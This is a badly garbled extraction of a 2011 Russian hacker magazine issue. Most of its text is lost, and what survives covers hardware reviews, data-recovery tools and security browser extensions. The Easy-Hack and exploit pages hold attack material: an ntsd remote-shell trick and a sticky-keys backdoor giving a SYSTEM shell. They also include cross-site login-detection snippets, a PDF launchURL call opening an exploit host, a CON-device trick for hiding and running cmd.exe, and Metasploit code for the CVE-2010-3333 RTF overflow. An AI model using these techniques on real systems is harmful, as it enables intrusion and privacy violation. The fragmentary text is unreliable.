
x 09 (152) 2011

.
210
:

GOOGLE CHROME 030

LULZSEC

082

LULZSEC / : , , FOX NEWS



WINDOWS 7

PHPMYADMIN
064

ANDROID 070
152

,
JAVASCRIPT 050

:
, ,
FOX NEWS

CODING
ALEKSANDR-EHKKERT@RAMBLER.RU

X 10 /141/ 10

INTRO


SMS, / -
.
3 5
.
,
: , 1,
FM, BBC

:).

, ,
. : sms

, cybercrime .
,
?

.
, ,
,
, - :
.
-
.
,

2015 ,
. ,
,
Google-hack .
nikitozz, . .
vkontakte.ru/xakep_mag

Content

MALWARE

MegaNews

004

Ferrum
016
020
021

Corpus vulgaris

PRO!
QNAP TS-459 Pro II

PC_Zone
027
028
029
030
036


,
Proof-of-Concept

SQL- 100

Live-

- Google Chrome
Google

UI- Windows 7

040

Easy-Hack

044

050

JavaScript:

,
-

Google

064

OWASP AppSec Europe 2011:


?

082

088

Pwnie Awards 2011

hacker tweets
-

phpMyAdmin

X-Tools

: RedEye, Crutop, Fethard Chronopay


LulzSec

: ?

092

098

38

102

Android-

106

Windows Phone 7.1

110

, !

114
118

-
Python

SYN/ACK
122
128

Forefront Endpoint Protection:

132

Windows

!
,

PHREAKING
136

068

076

063

wepawet

060

073 Drive-by-Download -

+5

056

Samsung S27A750D

022

070 Android-


iButton

140
143
144

FAQ UNITED
FAQ

8.5

WWW2

web-

022

070

Android-

136

iButton

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
PC_ZONE UNITS
step
(step@real.xakep.ru)

(magg@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
PHREAKING
(po@kumekay.com)
>

> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)


>PR-
(grigorieva@glc.ru)

> xakep.ru
(xa@real.xakep.ru)

/ART

>-
(alik@glc.ru)
>

/PUBLISHING
>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906
>

>

>

>

>

>

>

.: (495) 935-7034, : (495) 545-0906

> TECHNOLOGY
(komleva@glc.ru)
>
(olgaeml@glc.ru)
(alekhina@glc.ru)

>
(polikarpova@glc.ru)
>
, birarova@glc.ru
>
( )
(tatarenkova@glc.ru)
>
(ilk@glc.ru)
(goncharova.n@glc.ru)
>
(yakovleva.s@glc.ru)
> -
(alekseeva@glc.ru)
> MAN TV

: 8-800-200-3-999
>
101000, , , / 652,

,

77-11802 14.02.2002
Zapolex,
.
219 833 .

>

>


.

. ,
,
.


.
.


:
content@glc.ru

, , 2011

>
(kosheleva@glc.ru)
>
(lukicheva@glc.ru)
> :
DVD-: claim@glc.ru.
>

: (495) 545-09-06

: (495) 663-82-77

MEGANEWS
Mifrill (mifrill@real.xakep.ru)

Meganews

,
. , -

, 20- .
Whisper Systems (www.whispersys.com)
( )
Android. :
-
Google.
WhisperCore -,
Nexus S (3G) Nexus One,
, . .
.
:
.
. WhisperCore,
, .
,
. , -
IMEI , ,
.
,
GPS- . SD-,
WhisperMonitor,
,
FlashBack, ,
.

6 10 Adobe Reader , ,
Avast.

,

, ,
, - .
. , ,
, GScreen.
GScreen SpaceBook 17- ,
19201080 . , . ,
: 10 ,
4,54 ! ,
. ,
. Intel Core i5560M 2,66 , 4 DDR . ,
, Intel Core i7-740QM (1,73 )
(8 ). -


: $2395 $2795 .
50% .

WEXLER.HOME 903


, ( ,
). , , .
handycraft' , . ,
, .
.
WEXLER.HOME 903 64- Windows 7
, .

. , , ,
.

. WEXLER.HOME
750 . ,
, .

WEXLER.HOME 903 Windows 7 .


64- :
4 .
, Microsoft
Security Essentials Office 2010 Starter ( Word Excel, ).

Intel Core i5-650 3,2 - 4 . CPU



Turbo Boost, (, ). , .

GeForce GTX 460,


Fermi.
DirectX 11 GTX 460 , NVIDIA 3D
Vision, PhysX CUDA
, .
.

WEXLER.HOME 903
4 , .

Windows 7.

WEXLER
Wexler:
+7 (800) 200-9660
www.wexler.ru
Microsoft Windows 7, / ,
Microsoft.




,
, , ,
. .
( , 12-
). , ,

,
, Malware
-,
deeonis.
, : . ,
.
, ,

, .
, .
. , ,
/Livejournal/Facebook
. ,

Deeonis - VPN!
SmartHide, , !.
, , , deeonisa
. :
, - .
Stuxnet, ,
, ,
, . ,
:).
Microsoft, .
, . ,

: ,
Apple, . , . ,
, , ,
,
:).

.
, : -
, .
, .

Microsoft $250 000


, Rustock.

... IPHONE
. , iPhone Apple ,
.


,
,

,


,

.
,
,
, .
, , -


, , . Photojojo
,

SLR- Canon
Nikon iPhone.
,
- Canon
Nikon.
: iPhone
3/3GS $190, iPhone 4 $249.
, . .


WEXLER.SUN
Wexler. WEXLER.SUN
, .
,
,
.
, , , MP3/MP4-, , .
,

USB- 220 .
.
(90x40x8,5 , 45 ) , .
890 .

.
47,83% ,
G Data.
(47,29%), (47,23%) (45,4%).

Microsoft. Microsoft Malware Protection Center (MMPC)


Popureb,
.
, ,


, Windows
.
Trojan:Win32/Popureb.E,
, - ,
, , . ,
, , , Microsoft .
,

TDL-4 ( TDL-3, Alureon
TDL). 2011
4,52 ,
. TDL-4
20 -,
ZeuS, Gbot Optima.
,
. Popureb, TDL-4 . ,
64- Windows.
, TDL
, ,
. ,
, , .
, 50%
, TDL-4 .
, TDL ,
TDL-4 . 20-200 1000 ,
.
, , (
, !).

,
, .
... , .

Food Not Bombs.


, ,
, . :
. Anonymous - .
DDoS- .
Orlando Florida Guide,
.
AntiSec
. , IRC Federal
, ,
, ,
.
, ,
. Pastebin,
SQL-. IRC Federal ,
.
. The Pirate Bay
107 , .

11 .co.cc Google - ,
.



.
,
. , -
. ,

. ,
, ,


. ,
2012 , ,
. -, ,
, . . ,
.

WP7 MANGO

Microsoft Mango
Windows Phone 7.
. : Mango ,
, . , Mango IE 9 HTML 5 -. ,
Skype Windows Phone 7.
Microsoft , (, Twitter Facebook),
- .
- Worldwide Developer
Conference 2011 Windows Phone 7.1 Mango. Acer,
Fujitsu, ZTE Samsung. ,
, Microsoft
, $100-150.
,
, . ,
,
, .

McAfee
- ..
8 .


Apple
, ,

Apple .
,
, .
,
Dev-Team (jailbreakme.com, ) .
, iOS
. Apple
ASLR (Address Space Layout Randomization)
. PDF.
Apple , : ,
iOS. Dev-Team
, , PDF Patcher 2,
. ,
,
,
.


.


,
,


. ,

. AT&T, Verizon, Comcast,
Cablevision Time Warner Cable
, ...

, . -
(
), IP- . , , IP
.
, . ,

- . , . ,
-
, .
.

,
, Edifier.
MP250 ,

. ,

, MP250 , . ,
,
. MP250

USB- . ,
, ,
: 261 x 36
x 44 (xx), : ~0,33. ,
MP250
- .
-: 3 1,25
, 5 , - -: 4 1,25
. : RMS 2
x 2W . -: >75 (A).
: ~1 %. ,
MP250
, Reddot design award winner 2011,
IF Product design award 2011 Innovations
International CES.

2011 I
!. 5 55 ,
. . ? - I
www.petr-1.ru SMS 5206.
, -, MP4- DVD-.
, 100 .
.


15 2011 . 15 2012 .
15 2011 2 2011 . www.petr-1.ru sms 5206. , , , , ,
SMS www.petr-1.ru
, 18 .

Samsung Galaxy S II . 55
3 . Galaxy S
85 .



,
,
, . . 13 ,
,
,
. , .
. ,
, .
, , , , . ,
,
, ,
.
IPTP Networks, RETN
.
, , , , ,
. , -, .

, - ,
- ,
. , ,
.
? - .

5,14
AMD FX-8130P 3,8 Bulldozer.
.

SAFETY AND SECURITY CENTER


Microsoft Safety and
Security Center, , , . ,
, ,
. ,

VSFTPD


porn streaming. ,
. Microsoft

, . ,
, .

FTP- vsftpd
,
. vsftpd-2.3.4.tar.gz .
. shell TCP- 6200,
FTP- , .
,
. ,
.
, , .
, ,
Google App
Engine.
, .
: , . - .

#GOOGLE

Android,
Chrome Google+

$9,03

28,768

>160

$6,23


+1 .

500 000


2011
,
.

$2,48

AdSense.

$2,11


(

).


Google .

Android
.

130

Android
.

Android
Market .


Google Chrome.

2,3
$20

Google+.

10

Google+
. 1,3%
Facebook.


90 eBay.

SKYPE
Skype ,
.
,
. Skype Microsoft $8,5 , , ,
. , 2009 ,
Skype, Microsoft
(Legal Intercept),
, Skype
VoIP-. ,
,
,
.
: ,
, , . ,
(POTS), VoIP , , .
.

FERRUM

CORPUS

VULGARIS


.
, .
,
,
.


, . : ,
.
:
, , ,
, ,
, .
. 200
.
, .


,
( ), .
. , :
.
,
.
LinX.
FurMark. , HDD
AIDA64 Extreme Edition.
20 , .


:
:
ASRock 890FX Deluxe3
:
AMD Phenom II 970, 3500
:
Zalman CNPS 10X Extreme
:
Corsair Dominator GT 2000 , 4
:
SAPPHIRE Radeon HD 6970
:
Western Digital WD2001FASS, 2
:
FSP Epsilon, 700
:
Windows Vista x64


4700 .

4200 .

Aerocool Xpredator
Evil Black Edition

Antec DF-35

-: mATX, ATX Flex ATX, E-ATX, XL-ATX


:
5- : 6
3,5- : 6
: 2230
:
: 4USB 2.0, 1eSATA, ,

-: Mini-ITX, mATX, ATX


:
5- : 3
3.5- : 6
: 3120 , 1140
:
: 2USB 2.0, ,

230-
, .
, . ,
.
. , PCI-
.
.
. , Aerocool Xpredator Evil Black Edition
.
- . ,
.

Antec
.
DF-35, .
,
, . Antec ,
.
- , . ,
.

. , Antec
SSD.
2,5- .
Antec DF-35 -,
.
.
. ,
. Antec DF-35 .
, , , .
, -
.
, Antec ,
.


3500 .

5700 .

Corsair 600T

GIGABYTE Cupio 6140

-: mATX, ATX
:
5- : 4
3,5- : 6
: 1120 , 2200
:
: 4USB 2.0, 1xUSB 3.0, 1IEEE1394,
,

-: mATX, ATX
:
5- : 5
3,5- : 5
: 2120
:
: 2USB 2.0, 1 eSATA, 1xFireWire, ,

Corsair
.
. ,
, . ,
, .
,
. Corsair 600T
. -- .
.
,
.
: ,
. ,
, . ,
.
, .
Corsair 600T, , ,
. ,
.

GIGABYTE.
.
.
GIGABYTE Cupio 6140 .
, , . - . , . ,
. . ,
.
, .
, , , .
.
.
USB 2.0 eSATA, FireWire, -
.
.
, , . ,
, , ,
- .


10000 .

5600 .

SilverStone Raven 2

Thermaltake Level 10 GT

-: mATX, ATX, SSI CEB


:
5- : 5
3,5- : 5
: 1120 , 3180
:
: 2USB 2.0, ,

-: mATX, ATX, E-ATX


:
5- : 4
3,5- : 5
: 1200 , 1140
:
: 2USB 3.0, 4xUSB 2.0, 1eSATA, ,


.
, . , .
. .
.
.
,
, - .
,
,
,
.
, , . ,
.
, .
, , ,
SilverStone Raven 2 , !
.

, .

Thermaltake Level
10 GT. ,
BMW.
.
(12,7 ). ,
.
Thermaltake Level 10 GT , . , (
, ). . ,

.
molex-. Thermaltake Level 10 GT
,
, , .
, .
Thermaltake Level 10 GT, . ,
, .

.
SilverStone Raven 2, -
, - , . z



Samsung S27A750D
:
: 27"
: 1920x1080
: TFT TN
: 300 /2
: 1000:1
: 2
: HDMI, DisplayPort,


. .
,
. 27-
?
, .

Samsung S27A750D.

, 27 .
, , , , .
Samsung S27A750D , ,
.
.

. , , , .
, Samsung S27A750D . ,
, : HDMI DisplayPort. ,
- 3D-
HDMI-.

, ColorVision Spyder 3 Elite.


: , RGB. ,
, ,
. , , .
sRGB. , ,
.

HD- . , (CCFL).
, , . , , ,
CCFL, .
, .
! . , . - , ,
2 ,
. 3D.
,
Bluetooth. , ,
. , ,
, Samsung S27A750D
3D-, 2D-,
.

, - , . :
Full HD, , ,
Samsung S27A750D.
- , , ,
.
+ 2D 3D .
- .
z

. , Samsung S27A750D . 19801080 . ,


39 000 .

PRO!

QNAP TS-459 Pro II

NAS, ,
. QNAP
, ,
.
Citius, Altius, Fortius!

NAS, , . QNAP TS-459 Pro II Intel Atom D525,


1800 . , Atom .
Hyper Threading
. 1 DDR3.
.
, QNAP TS-459 Pro II
, : 3 . ,
QNAP SATA 3.0. , , QNAP TS-459 Pro II
: , TS-459 Pro
DDR3 ( DDR2).
QNAP . ,
RJ-45,
,
Multi-IP. , QNAP TS-459 Pro II
USB eSATA.
USB 3.0,
.

, , Wi-Fi- USB-.
QNAP TS-459 Pro II
: 19 35
.

, , .
.
, ,
. , 3.4 RAID 10, RAID 0 RAID 1. RTRR (Real-time Remote Replication),

. ,
Amazon S3
ElephantDrive. ,
QNAP : www.qnap.ru.

QNAP TS-459 Pro II


, : , ,
iSCSI . z


PC_ZONE


,
:).
,
. .

,
, ,
. ,
, . ,
.
, . :
1. (<shift+del>) .
2. ( ).
3.

( ).
, ,


.
dd. , -,
sudo dd if=/dev/zero of=/dev/sdb1 bs=512 count=1 conv=noerror (sdb1 ,
). -,

sudo dd if=/dev/zero of=/dev/sdb1 bs=512 count=1 seek=n conv=noerror
n, n 1 511968
(511968 ). ,
. 16
: 6 3 .

, . .


UFS Explorer Recovery


: Windows, Linux, BSD, Mac OS X
: NTFS, FAT, Ext2, Ext3, Ext4, XFS,
FFS, HFS, HFS+
: ( )
: 21,95 129,95
: www.ufsexplorer.com

R-Studio
: Windows
: FAT12/16/32/exFAT, NTFS, HFS/
HFS+, UFS1/UFS2, Ext2/Ext3/Ext4
: ( )
: $79 $179
: www.data-recovery-software.net

R-studio , .
.
,
, . , R-Studio -
, . ,
,
- .
R-Studio
,
RAID-.
RAID ,
. -
,
.
.
R-Studio ,
,
. .
$79,
$49 ,
FAT NTFS.
, , .

INFO

info
,

(,
Photo Recovery Genius,
DiskInternals Flash
Recovery). , ,

,
, ,
. !


.

, ,
. UFS Explorer Recovery
R-Studio: Mercedes S-,
, .

- , XFS.
? . ,
? , :
NAS
.
R.Studio, , : UFS Explorer
. , .
. UFS Explorer
Recovery
standard, professional raise data recovery.
39,95,
49,95 21,95. , professional
. standard RAID-
.vim- ( ).
( ) raise data recovery

( raise).
:
, ,
RAID .vim-, , .
: .

:
, ,
RAID, , .
: .


File Scavenger
: Windows
: FAT, NTFS
: ( )
: $49,95
: www.quetek.com

RecoverMyFiles
: Windows
: FAT, NTFS, HFS, HFS+
: ( )
: $69,95 $299,90
: www.recovermyfiles.com


File Scavenger
.

. , , File Scavenger. RecoverMyFiles

Windows Mac OS X,
EXT2 EXT3. ,
$69,95.

DVD
dvd


,

.

, . File Scavenger 1 , . ,
. File Scavenger
.
. :
. , .

.
RAID-.
,
.
File Scavenger $49,95.
: , RAID, ,
.
: .

: , RAID, .
: , .


1. ( )! .
, .
2. ,
. . .
3. , , ,
. .
, .


GetDataBack
: Windows
: FAT, NTFS
: ( )
: $69-$79
: www.runtime.org

:
GetDataBack ,
, . .
.
.
,
. , , GetDataBack
,
, .

.
NTFS FAT, $79 $69 .

EasyRecovery
: Windows
: FAT, NTFS
: ( )
: 6458 .
: www.easyrecovery.ru

EasyRecovery . , . EasyRecovery
FAT
NTFS,
. . -,
( ), -, MS Office zip-.
Raw Recovery.
EasyRecovery .
,
, .
, , ,
. ,
6 .

: ,
.
: .

: , ,
MS Office zip-.
: , .


R-Studio
UFS Explorer Recovery
EasyRecovery
File Scavenger
RecoverMyFiles
GetDataBack
Stellar Phoenix
R.Saver

+
+
+
+
+
+
+
+

+
+
+
+
+
+
+
+

+
+
+
+
+

$79 $179
21.95 129.95

$230 $3300
$49.95
$69.95 $299.90
$69 $79
$49
Free

Recuva
PC INSPECTOR File Recovery
Restoration
Undelete Plus
FreeUndelete
Avira UnErase
Roadkil's Undelete
Avira UnRase

+
+
+
+
+
+
+
+

+
+
+

Free
Free
Free
Free
Free
Free
Free
Free


Recuva

R.Saver

: Windows
: FAT, NTFS
: ( )
: www.piriform.com/recuva

: Windows
: FAT, NTFS
: ( )
: rlab.ru/tools/rsaver.html


, . , -, . Recuva
, .
. ,
, .
.

.

R.Saver ,
. , ,
UFS Explorer Recovery. , .
. R.Saver

FAT NTFS. ,
: Apple Mac OS
(HFS, HFS+/HFSX), Linux (Ext2, Ext3, Ext4, ReiserFS, JFS XFS) .. ,
RAID-
, R.Saver . .

: .
: .

: .
: .

PC INSPECTOR File Recovery


: Windows
: FAT, NTFS
: ( )
: www.pcinspector.de

, Recuva,
. , ,
.
PC INSPECTOR Smart Recovery,
.
: .
: .

, : ?. .
R-Studio UFS Explorer Recovery. .
, . , R.Saver . , . z

(unconciousmind.blogspot.com)

Proof-of-Concept
SQL-
100


,
:
?.

sqlmap (sqlmap.sourceforge.net),
,

SQL- .

SQL (,
')
)
( AND 1=1)
,
.

,

DBMS,
.
,
?

98 DSSS


? ,
,
, 100 ,
, ,

.
, , . Damn Small
SQLi Scanner (DSSS), Python. ,
98 .

, (SQL poisoning),
DBMS (MySQL, Oracle, PostgreSQL,
Microsoft SQL Server ..),

.
,
, HTTP (200, 404, ..), (
Python- difflib). ,
.
Damn Small SQLi
Scanner (github.com/stamparm/DSSS),

. ,
, ,
- . z

INFO

info




DVD-.

Damn Small SQLi Scanner


SQL-

Step (twitter.com/stepah)

, Windows 7
.
: ,
,
:). ,

, (
),

. ( ),
.
. .
,
, ,

,
NTFS. .
Win7PE
. : ? ,
Win7PE, Backtrack - ?
- .

grub4dos grubinst
(download.gna.org/grubutil)
menu.lst,
ISO-.


:
YUMI (www.pendrivelinux.com);
SARDU (www.sarducd.it);
XBOOT (sites.google.com/site/shamurxboot).
GUI,

. , ,
XBOOT.
1.
.
dragndrop-
ISO,
Create
Multiboot USB/ISO.

(,
):
,
,
, ,
(Linux, Utility
..). , Offline NT Password & Registry
Editor Backtrack

. -
.
2. .

, XBOOT .
,
PE, MSDART, ERD (Windows Vista
& 7 only.). , ,

Add using
Grub4dos image Emulation.
.
3. ISO

.
(), (Syslinux, , Grub4Dos).
.
,

QEMU,
XBOOT.
, ( !)
.

-
syslinux.cfg.
4. , , .
- VMware/
QEMU/VirtualBox, ,
.
:
,
.
multibootable-

FAT32. NTFS Linux .
FAT32,

RMPrepUSB tool (sites.google.com/site/rmprepusb), 2 .
. XBOOT
.NET
Framework 4.
,
PGK.Extensions,
dll- dnpextensions.codeplex.com
%windir%/system32.
,
,
.
.

QEMU


, , . ,
.
Live .

F-Secure Rescue CD
Norton Bootable Recovery Tool
Avira AntiVir Rescue System
Kaspersky Kav Rescue CD
Panda Safe Cd
AVG Rescue CD

CloneZilla

Norton
Ghost ,

.

Parted Magic/
GParted
,
,

,

.

PING (Partimage Is
Not Ghost)
LiveCD-,

,
,

,
.

SystemRescueCd


.

Ophcrack Live

LM/NTLM
Windows

.

Offline NT Password
& Registry Editor

,

- Windows
-
, .

Kon-Boot
, ,

,

Windows Linux,
.


Magic Boot Disk


MHDD




.

Trinity Rescue Kit


Windows-,
5 .

Redo Backup Live CD


,

.

YLMF

,

Live-,

Linux,
Windows
XP

Wine.

Memtest86+


,
RAM,

.

BitDefender Rescue CD
Dr.Web LiveCD
eScan Rescue Disk
GData AntiVirus Emergency System
Acronis Antimalware CD
Ubuntu Malware Removal Toolkit

netboot.me
,



,
.

NetBootCD


Linux
.

Ultimate Boot CD
100
,


.

Inquisitor Live
,


.

Darik's Boot
And Nuke
!



,
(
) .

Tails

Tor-.

Step (twitter.com/stepah)

-
Google Chrome



Google

Google Chrome,
,
. !
, ,
. ,
.


Fingerprinting

Wappalyzer bit.ly/oTIa1K

, -. - , -
, , ( ) .

Firefox,
, , . , ,
,
.
CMS//
, . , <meta name="generator" content="WordPress 3.1" />
, WordPress. Wappalyzer, .
Wappalyzer
, , ,
-, .

Web Server Notifier


bit.ly/nKwZm4


( ) , -,
. Apache, IIS,
Nginx, GWS, Lighttpd -
-, Web Server Notifier
.


Chrome Sniffer
bit.ly/qIVfbx

Chrome Sniffer Wappalyzer


fingerprinting

, JS.
100 .


.

Web Technology Notifier


bit.ly/nDL6yl

, -:
Ruby, PHP, ASP.NET - ? Web
Technology Notifier
fingerprinting. ,

: ,
Phusion Passenger Ruby
Zope Python.

IP Address information
bit.ly/o93jXj


WHOIS . , ,
,
IP Address information. , WHOIS,
-,
DNS, , ( )
( ,
).

HTTP Headers
bit.ly/plI977



,
HTTP (, X-Powered-By
Server).
,
HTTP Headers.


HTTP-

, ,
. , ,
-, HTTP-, -, -,
, , , -,
.

Request Maker bit.ly/oRVhVW

Firefox Tamper Data,


HTTP/HTTPS-, POST-.
Google
Chrome , Request Maker .
,
-, URL, ,
POST-,
. , Request Maker , ,
HTML- XMLHttpRequests,

CSS-.

HTTP Response
Browser bit.ly/oWvHIP

,
Request Maker,

HTTP- ( XMLHttpRequest,
).


.

Advanced REST client


Application bit.ly/pXo2Yb

,
, Chrome-
(, ).
HTTP Response Browser,
HTTP-. Advanced REST client ,

JSON XML ,
HTTP- ( +
) . , ,
JSON XML-.

- , .
, ,
(--) . , Chrome, , . .

Edit This Cookie bit.ly/pLCa0N

,
. Edit This Cookie,
,
.
: ,
,
.
Read-Only-,

.


Swap My Cookies bit.ly/ojcXXU


. ,
Swap My Cookies. , .

, ,
.
.

Web Securify
bit.ly/rbIxuQ

, . , Websecurify,

.

Chrome.

, SQL Injection, Cross-site
Scripting, Cross-site Request Forgery,
Local/Remote File Include ..
.

Anti XSS bit.ly/o78fKn


, XSS, ,

.
, ,

.


Google Chrome ,
XSS-, SQL-, . , ,
( ).

XSS Rays bit.ly/qZwexS


, XSS, XSS , . Scan


(
). , ,
?
Reverse
, .

-.

Firebug lite for Chrome


bit.ly/ogdqzj

-, Firebug lite.
,
, - Google Chrome.
, , Firebug lite
JavaScript-,
JS-.

, ,
HTML-,
CSS .
Inspect:
, Firebug lite
, .

iMacros for Chrome


bit.ly/p6Eua9


- ,

.
,
.

, Firefox, Chrome.


,
. : (
, ),
, ,
.

NotScripts
bit.ly/py5Wyy

IP-
bit.ly/n2c0C3

KB SSL Enforcer
bit.ly/n1YRw2

Proxy Switchy!
bit.ly/pNtr9V

Tampermonkey
bit.ly/qXeLGm

Click&Clean
bit.ly/qlwAQP

,
NoScript Firefox,
.

, ,
XSS Clickjacking :).


.
-
. ,
:
URL
-. ,
- Pandora,
,
.


, , . What is
my ip adresse IP-,
, ,
.

,
Greasemonkey,
JS-,
.
Tampermonkey 90%
Chrome,
,
Greasemonkey. ,
- ,
.

userscripts.org.

,
.
SSL,

. KB SSL Enforcer ,
SSL-
, .


- ,
.
, : Flash-cookies,
LSO-
(Local Shared Objects), Silverlight,
Java. Click&Clean ,
,
. ,
.


UI-
Windows 7
+5

,
,
. ,
- ,
.

DVD
dvd





.

- , ( Windows Explorer)
, . ,
- ,
.
? , .

QTTabBar

Listary

qttabbar.wikidot.com
,
, . , , -
Microsoft. QTTabBar,
Windows Explorer,
, .
, , ,

, , .

www.listary.com
, ,
. Listary.
Findas-you-type. Windows Explorer .
,
.
?, *.
, : , , smart- ( cmd.exe ,
..).


TeraCopy

HashTab

www.codesector.com/teracopy.php

TeraCopy. - Total
Commander, ,
. .
,
TeraCopy. . ,
,
/ ,
.

beeblebrox.org

,

.
,
,
.
,

, HashTab.
must have!

Windows 7, ,
. , ( ),
Microsoft. , . .

Windows 7 Taskbar Items Pinner

Bins

www.door2windows.com
, , , ( exe-).
-
.
, ,

, .

www.oneupindustries.com/bins
,
.
Bin .
dragndrop-
.
,
.


SuperbarMonitor

Gmail Notifier Plus

superbarmonitor.de
Windows 7
.
SuperbarMonitor

, ,
.. .

bit.ly/71CVn2
Windows7

GMail ( ). ,
Inbox,
.. Jump List.

, , , . , .
, ,
. , , . .

Launchy

multibar

www.launchy.net
, ,
, .
Spotlight Mac OS X,
,
. Launchy
. (
<Ctrl>+<Space>),
.
, Launchy
. <Enter>. Launchy
, , , . ,
(,
SSH- PuTTY ).

www.ticno.com

. , ,
multibar. ,
,
. - ,

.



:

multibar.

( ) .

JumpPad
http://bit.ly/pMeUBH
Mac OS X Lion
Launchpad. , JumpPad,
. ,
, ,
- . , ,
. ,

.


Windows 7,
. , . , .
, . ? - .

Desktops

360desktop

Fences

bit.ly/dHzGj8
, , -
.
, Microsoft
Desktops ( ,
, Windows).
Desktops
. ,

.

www.360desktop.com


,
.
, ,
,

, .
, ,
.

www.stardock.com/products/fences
,
. , ,
: ,
, , .
, . Fences
, .
,

. ,
,
. Fences
:
,
.

, , . ,
, , - .

Switcher

Acer Gridvista
bit.ly/qrSL2q
,
, drag & drop
.
, Acer. ,

, .
,
, , .

insentient.net
Switcher . ,
. ,
Mac OS X. ,
,
.

eXtra Buttons
www.xtrabuttons.com
,
(,
, )
9 ,
, ,
( ).



GreenDog (agrrrdog@gmail.com)

Easy Hack
1

:

WINDOWS.

:
. , ,
. :). , , :
ntsd -server tcp:port=4444 calc.exe

NTSD Microsoft NT Symbolic Debugger, , .


%Windows%\system32. ntsd
(calc.exe),
. -server ,
4444 (tcp:port=4444).
. ,
netcat , ntsd:
ntsd -remote tcp:server=192.168.138.128,port=4444

, -remote
,
4444.
:

:
SYSTEM, .

:
Windows. -
,
, . ,
,
.
. , ,
.
? .
1. LiveCD
. ,
,
%Windows%\system32\config.
2. - ,




.shell

! , .
, ntsd
Windows 7 2008.
MS .

Windows , , . , ntsd
.

. sethc.exe, utilman.exe. ,
? :). %Windows%\system32, cmd.exe,
exe Meterpreter MSF, - (
).
3. .
:). <Shift> sethc.exe, . <Win+U> ( )
utilman.exe, .
4. , cmd.exe,
. . : NT AUTHORITY\SYSTEM,
.
5. , meterpreter.

, .
:
100% WIN!

DVD

dvd

: ,
.

src="https://mail.google.com/mail/photos/img/photos/
public/AIbEiAIAAABDCKa_hYq24u2WUyILdmNhcmRfcGhvdG8qKDI1
ODFkOGViM2I5ZjUwZmZlYjE3MzQ2YmQyMjAzMjFlZTU3NjEzOTYwAZwS
Cm_MMUDjh599IgoA2muEmEZD"
/>

:
EasyHack
, , , .
, .
, .
. , (Gmail,
Twitter, Facebook ..) ? Mike Cardwell (goo.gl/FIO8a) . , , .
, (404,
500 ..), (200).
.
.
Gmail,
,
:
<img style="display:none;"
onload="logged_in_to_gmail()"
onerror="not_logged_in_to_gmail()"

:
, PDF.

:
.
, ,
, Chrome. ?
, ,
IE ,
,
.
, IE . ,
,
PDF- IE. PDF- :

, . , onload ,
, onerror (
). Gmail. ,
,
html-.
<script type="text/javascript"
src="https://twitter.com/account/use_phx?setting=false&amp;format=text"
onload="not_logged_in_to_twitter()"
onerror="logged_in_to_twitter()"
async="async"
></script>

IE Opera, , onload
.
? , .
. , ,
- :).

,
PDF, PDF, Acrobat Reader,
( IE).
: bit.ly/pSuNmj. , , PDF
, ,
.

app.launchURL("http://exploit-for-ie.com/",true);

. Acrobat Reader
, .
API- URL .
.

FireFox PDF IE


:
HTTPS.

:
, HTTPS , (
), (
). , ,
SSL ( 3 TLS), . ,
HTTP , , HTTPS,

, .
- . , HTTPS
.
, ,
.
,
. , ,
. ,
, . ,
, , URL
. ,
, . :).
, ,
,
, .
,
: , Wi-Fi
Man-in-the-middle-. HTTPS, ,
. ?
, Secure
Cookie.
HTTPS.
, ,
.
1. . ,
HTTPS, , HTTPS.
, ,

:
.

:
Session_Fixation
(bit.ly/nMswUp). , ,
.

. -, ,

.
-, . ? ,


, Secure,
Domain
.
, . ,
.
2. . ,
-
. . ,
, 80 https- ,
443 . .
HTTP- . -,
iframe () ,
(80 ). , iframe,
.
,
21, 22, 25, 110,
(,
Firefox) .
, Secure
. ?
-, ,
. -,
-. , Apache Tomcat 6.20
Secure .

.
:
1) .
2) .
3)
,
.
4) .
5) ,
.
,
. HTTP,
HTTPS.
WebGoat OWASP (bit.ly/jeqeOF). -
.

:
WINDOWS.

:
, :). , .
? , .
,
.
DOS , ,
(, ,
, :). backward
capability Windows. ,
CON, AUX, COMx, NUL, PRN, LPTx, CLOCKx ( x
1 9). , , .
, , .
/ .
. ,
:
Copy file.txt \\.\c:\CON

,
. file.txt.
CON . , .
Copy \\.\c:\CON file.txt

,
exe. , CON cmd.exe:

copy c:\windows\system32\cmd.exe \\.\c:\CON

,
CON-cmd.exe:
wmic process call create \\.\c:\CON

, Windows XP 7.
- ,
. ,
. z



iv (ivinside.blogspot.com)
pikofarad (115612, . , .1)

, !
,
. ,
. -
, , , ,
,
. ,
.

01

MS Office 2010 RTF Header Stack


Overflow Vulnerability Exploit

CVSS V2 BASE SCORE:

9.3 (HIGH)

(AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
: 3 2011
: Snake
CVE: CVE-2010-3333
Microsoft Office XP SP3, Office 2003 SP3,
Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac
2011 and Open XML File Format Converter for Mac ,
RTF-.
( ), , Ikazuchi DEP/ASLR Bypass,
DEP/ASLR.
EXPLOIT
RTF (Rich Text Format) Microsoft Office
Word 2003:


.
.
:
{ \shp, { \*\shpinst.
. :
{\sp{\sn PropertyName}{\sv PropertyValueInformation}}

, \sp
: (\sn) (\sv).
POC RTF- \sn, pFragments
, \sv, pFragments.
, ,
, , ,
RTF- .
:
{\rtf1{\shp{\*\shpinst{\sp{\sn pFragments}{\sv A;B;[word1][word2][word3][hex_value_array]}}}}}

A , 2,4 8;
B ;
word1 2- (sizeof(WORD)), ;

, phpMyAdmin
word2 2- , word1;
word3 2- ,
;
word1*word2
hex_value_array,
;
hex_value_array , ,
, ,
.
word1, word2 word3 : , .
metasploit, rtf-,
:
sploit = "%d;%d;" % [el_size, el_count]
sploit << data.unpack('H*').first
sploit << rest.unpack('H*').first
content = "{\\rtf1"
content << "{\\shp"
content << "{\\sp"
content << "{\\sn pFragments}"
content << "{\\sv #{sploit}}"


mso.dll:
39200b61  je short mso.39200b82
39200b63  mov ecx,dword ptr ss:[ebp+8]
39200b66  mov eax,dword ptr ds:[ecx+c]
39200b69  and eax,0ffff
39200b6e  push eax                         ; n
39200b6f  imul eax,dword ptr ss:[ebp+10]
39200b73  add eax,dword ptr ds:[ecx+10]
39200b76  push eax                         ; src
39200b77  push dword ptr ss:[ebp+c]        ; dest
